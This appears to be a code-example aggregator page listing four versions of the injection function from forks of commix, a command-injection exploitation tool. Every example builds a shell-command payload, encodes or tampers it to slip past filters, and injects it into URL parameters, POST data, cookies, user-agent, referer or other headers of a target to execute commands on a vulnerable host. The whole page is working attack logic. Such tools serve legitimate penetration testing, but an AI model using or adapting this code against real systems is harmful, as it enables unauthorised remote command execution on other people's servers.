Ejemplos de cmd_execution_alter_shell en Python

Ejemplo n.º 1

Archivo: eb_injector.py Proyecto: doctordeep/commix

def injection(separator, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, alter_shell, filename):
  
  # Execute shell commands on vulnerable host.
  if alter_shell:
    payload = eb_payloads.cmd_execution_alter_shell(separator, TAG, cmd)
  else:
    payload = eb_payloads.cmd_execution(separator, TAG, cmd)

  # Fix prefixes / suffixes
  payload = parameters.prefixes(payload, prefix)
  payload = parameters.suffixes(payload, suffix)
  # Fixation for specific payload.
  if ")%3B" + urllib.quote(")}") in payload:
    payload = payload.replace(")%3B" + urllib.quote(")}"), ")" + urllib.quote(")}"))

  if menu.options.base64:
    payload = urllib.unquote(payload)
    payload = base64.b64encode(payload)
  else:
    payload = re.sub(" ", "%20", payload)

  # Check if defined "--verbose" option.
  if menu.options.verbose:
    sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload + Style.RESET_ALL)

  # Check if defined cookie with "INJECT_HERE" tag
  if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
    response = cookie_injection_test(url, vuln_parameter, payload)

   # Check if defined user-agent with "INJECT_HERE" tag
  elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
    response = user_agent_injection_test(url, vuln_parameter, payload)

  # Check if defined referer with "INJECT_HERE" tag
  elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
    response = referer_injection_test(url, vuln_parameter, payload)

  else:
    # Check if defined method is GET (Default).
    if http_request_method == "GET":
      # Check if its not specified the 'INJECT_HERE' tag
      #url = parameters.do_GET_check(url)
      
      target = re.sub(settings.INJECT_TAG, payload, url)
      vuln_parameter = ''.join(vuln_parameter)
      request = urllib2.Request(target)
      
      # Check if defined extra headers.
      headers.do_check(request)  

      # Get the response of the request
      response = get_request_response(request)
     
    else :
      # Check if defined method is POST.
      parameter = menu.options.data
      parameter = urllib2.unquote(parameter)
      
      # Check if its not specified the 'INJECT_HERE' tag
      parameter = parameters.do_POST_check(parameter)
      
      # Define the POST data   
      if settings.IS_JSON == False:
        data = re.sub(settings.INJECT_TAG, payload, parameter)
        request = urllib2.Request(url, data)
      else:
        payload = payload.replace("\"", "\\\"")
        data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter)
        data = json.loads(data, strict = False)
        request = urllib2.Request(url, json.dumps(data))
      
      # Check if defined extra headers.
      headers.do_check(request)

      # Get the response of the request
      response = get_request_response(request)

  return response

Ejemplo n.º 2

Archivo: eb_injector.py Proyecto: BMaChina/commix

  def check_injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename):
    # Execute shell commands on vulnerable host.
    if alter_shell:
      payload = eb_payloads.cmd_execution_alter_shell(separator, TAG, cmd)
    else:
      payload = eb_payloads.cmd_execution(separator, TAG, cmd)

    # Fix prefixes / suffixes
    payload = parameters.prefixes(payload, prefix)
    payload = parameters.suffixes(payload, suffix)
    # Fixation for specific payload.
    if ")%3B" + urllib.quote(")}") in payload:
      payload = payload.replace(")%3B" + urllib.quote(")}"), ")" + urllib.quote(")}"))

    # Whitespace fixation
    payload = re.sub(" ", whitespace, payload)

    if settings.TAMPER_SCRIPTS['base64encode']:
      from src.core.tamper import base64encode
      payload = base64encode.encode(payload)

    # Check if defined "--verbose" option.
    if settings.VERBOSITY_LEVEL >= 1:
      info_msg = "Executing the '" + cmd + "' command: "
      sys.stdout.write("\n" + settings.print_info_msg(info_msg))
      sys.stdout.flush()
      sys.stdout.write("\n" + settings.print_payload(payload) + "\n")

    # Check if defined cookie with "INJECT_HERE" tag
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
      response = cookie_injection_test(url, vuln_parameter, payload)

     # Check if defined user-agent with "INJECT_HERE" tag
    elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
      response = user_agent_injection_test(url, vuln_parameter, payload)

    # Check if defined referer with "INJECT_HERE" tag
    elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
      response = referer_injection_test(url, vuln_parameter, payload)

    # Check if defined custom header with "INJECT_HERE" tag
    elif settings.CUSTOM_HEADER_INJECTION:
      response = custom_header_injection_test(url, vuln_parameter, payload)

    else:
      # Check if defined method is GET (Default).
      if http_request_method == "GET":
        # Check if its not specified the 'INJECT_HERE' tag
        #url = parameters.do_GET_check(url)
        
        target = re.sub(settings.INJECT_TAG, payload, url)
        vuln_parameter = ''.join(vuln_parameter)
        request = urllib2.Request(target)
        
        # Check if defined extra headers.
        headers.do_check(request)  

        # Get the response of the request
        response = requests.get_request_response(request)
       
      else :
        # Check if defined method is POST.
        parameter = menu.options.data
        parameter = urllib2.unquote(parameter)
        
        # Check if its not specified the 'INJECT_HERE' tag
        parameter = parameters.do_POST_check(parameter)
        parameter = parameter.replace("+","%2B")
        
        # Define the POST data   
        if settings.IS_JSON == False:
          data = re.sub(settings.INJECT_TAG, payload, parameter)
          request = urllib2.Request(url, data)
        else:
          payload = payload.replace("\"", "\\\"")
          data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter)
          data = json.loads(data, strict = False)
          request = urllib2.Request(url, json.dumps(data))
        
        # Check if defined extra headers.
        headers.do_check(request)

        # Get the response of the request
        response = requests.get_request_response(request)

    return response

Ejemplo n.º 3

Archivo: eb_injector.py Proyecto: zxc135781/commix

    def check_injection(separator, TAG, cmd, prefix, suffix, whitespace,
                        http_request_method, url, vuln_parameter, alter_shell,
                        filename):
        # Execute shell commands on vulnerable host.
        if alter_shell:
            payload = eb_payloads.cmd_execution_alter_shell(
                separator, TAG, cmd)
        else:
            payload = eb_payloads.cmd_execution(separator, TAG, cmd)

        # Fix prefixes / suffixes
        payload = parameters.prefixes(payload, prefix)
        payload = parameters.suffixes(payload, suffix)
        # Fixation for specific payload.
        if ")%3B" + _urllib.parse.quote(")}") in payload:
            payload = payload.replace(")%3B" + _urllib.parse.quote(")}"),
                                      ")" + _urllib.parse.quote(")}"))

        # Whitespace fixation
        payload = payload.replace(" ", whitespace)

        # Perform payload modification
        payload = checks.perform_payload_modification(payload)

        # Check if defined "--verbose" option.
        if settings.VERBOSITY_LEVEL >= 1:
            debug_msg = "Executing the '" + cmd + "' command. "
            sys.stdout.write(settings.print_debug_msg(debug_msg))
            sys.stdout.flush()
            sys.stdout.write("\n" + settings.print_payload(payload) + "\n")

        # Check if defined cookie with "INJECT_HERE" tag
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
            response = cookie_injection_test(url, vuln_parameter, payload)

        # Check if defined user-agent with "INJECT_HERE" tag
        elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
            response = user_agent_injection_test(url, vuln_parameter, payload)

        # Check if defined referer with "INJECT_HERE" tag
        elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
            response = referer_injection_test(url, vuln_parameter, payload)

        # Check if defined host with "INJECT_HERE" tag
        elif menu.options.host and settings.INJECT_TAG in menu.options.host:
            response = host_injection_test(url, vuln_parameter, payload)

        # Check if defined custom header with "INJECT_HERE" tag
        elif settings.CUSTOM_HEADER_INJECTION:
            response = custom_header_injection_test(url, vuln_parameter,
                                                    payload)

        else:
            # Check if defined method is GET (Default).
            if http_request_method == "GET":
                # Check if its not specified the 'INJECT_HERE' tag
                #url = parameters.do_GET_check(url)

                target = url.replace(settings.INJECT_TAG, payload)
                vuln_parameter = ''.join(vuln_parameter)
                request = _urllib.request.Request(target)

                # Check if defined extra headers.
                headers.do_check(request)

                # Get the response of the request
                response = requests.get_request_response(request)

            else:
                # Check if defined method is POST.
                parameter = menu.options.data
                parameter = _urllib.parse.unquote(parameter)
                # Check if its not specified the 'INJECT_HERE' tag
                parameter = parameters.do_POST_check(parameter)
                parameter = ''.join(str(e)
                                    for e in parameter).replace("+", "%2B")
                # Define the POST data
                if settings.IS_JSON:
                    data = parameter.replace(
                        settings.INJECT_TAG,
                        _urllib.parse.unquote(payload.replace("\"", "\\\"")))
                    try:
                        data = checks.json_data(data)
                    except ValueError:
                        pass
                elif settings.IS_XML:
                    data = parameter.replace(settings.INJECT_TAG,
                                             _urllib.parse.unquote(payload))
                else:
                    data = parameter.replace(settings.INJECT_TAG, payload)
                request = _urllib.request.Request(
                    url, data.encode(settings.UNICODE_ENCODING))

                # Check if defined extra headers.
                headers.do_check(request)

                # Get the response of the request
                response = requests.get_request_response(request)

        return response

Ejemplo n.º 4

    def check_injection(separator, TAG, cmd, prefix, suffix, whitespace,
                        http_request_method, url, vuln_parameter, alter_shell,
                        filename):
        # Execute shell commands on vulnerable host.
        if alter_shell:
            payload = eb_payloads.cmd_execution_alter_shell(
                separator, TAG, cmd)
        else:
            payload = eb_payloads.cmd_execution(separator, TAG, cmd)

        # Fix prefixes / suffixes
        payload = parameters.prefixes(payload, prefix)
        payload = parameters.suffixes(payload, suffix)
        # Fixation for specific payload.
        if ")%3B" + urllib.quote(")}") in payload:
            payload = payload.replace(")%3B" + urllib.quote(")}"),
                                      ")" + urllib.quote(")}"))

        # Whitespace fixation
        payload = re.sub(" ", whitespace, payload)

        # Encode payload to base64 format.
        if settings.TAMPER_SCRIPTS['base64encode']:
            from src.core.tamper import base64encode
            payload = base64encode.encode(payload)

        # Encode payload to hex format.
        elif settings.TAMPER_SCRIPTS['hexencode']:
            from src.core.tamper import hexencode
            payload = hexencode.encode(payload)

        # Check if defined "--verbose" option.
        if settings.VERBOSITY_LEVEL >= 1:
            info_msg = "Executing the '" + cmd + "' command... "
            sys.stdout.write(settings.print_info_msg(info_msg))
            sys.stdout.flush()
            sys.stdout.write("\n" + settings.print_payload(payload))
        if settings.VERBOSITY_LEVEL >= 1 and not menu.options.ignore_session:
            print ""

        # Check if defined cookie with "INJECT_HERE" tag
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
            response = cookie_injection_test(url, vuln_parameter, payload)

        # Check if defined user-agent with "INJECT_HERE" tag
        elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
            response = user_agent_injection_test(url, vuln_parameter, payload)

        # Check if defined referer with "INJECT_HERE" tag
        elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
            response = referer_injection_test(url, vuln_parameter, payload)

        # Check if defined custom header with "INJECT_HERE" tag
        elif settings.CUSTOM_HEADER_INJECTION:
            response = custom_header_injection_test(url, vuln_parameter,
                                                    payload)

        else:
            # Check if defined method is GET (Default).
            if http_request_method == "GET":
                # Check if its not specified the 'INJECT_HERE' tag
                #url = parameters.do_GET_check(url)

                target = re.sub(settings.INJECT_TAG, payload, url)
                vuln_parameter = ''.join(vuln_parameter)
                request = urllib2.Request(target)

                # Check if defined extra headers.
                headers.do_check(request)

                # Get the response of the request
                response = requests.get_request_response(request)

            else:
                # Check if defined method is POST.
                parameter = menu.options.data
                parameter = urllib2.unquote(parameter)

                # Check if its not specified the 'INJECT_HERE' tag
                parameter = parameters.do_POST_check(parameter)
                parameter = parameter.replace("+", "%2B")

                # Define the POST data
                if settings.IS_JSON == False:
                    data = re.sub(settings.INJECT_TAG, payload, parameter)
                    request = urllib2.Request(url, data)
                else:
                    payload = payload.replace("\"", "\\\"")
                    data = re.sub(settings.INJECT_TAG, urllib.unquote(payload),
                                  parameter)
                    data = json.loads(data, strict=False)
                    request = urllib2.Request(url, json.dumps(data))

                # Check if defined extra headers.
                headers.do_check(request)

                # Get the response of the request
                response = requests.get_request_response(request)

        return response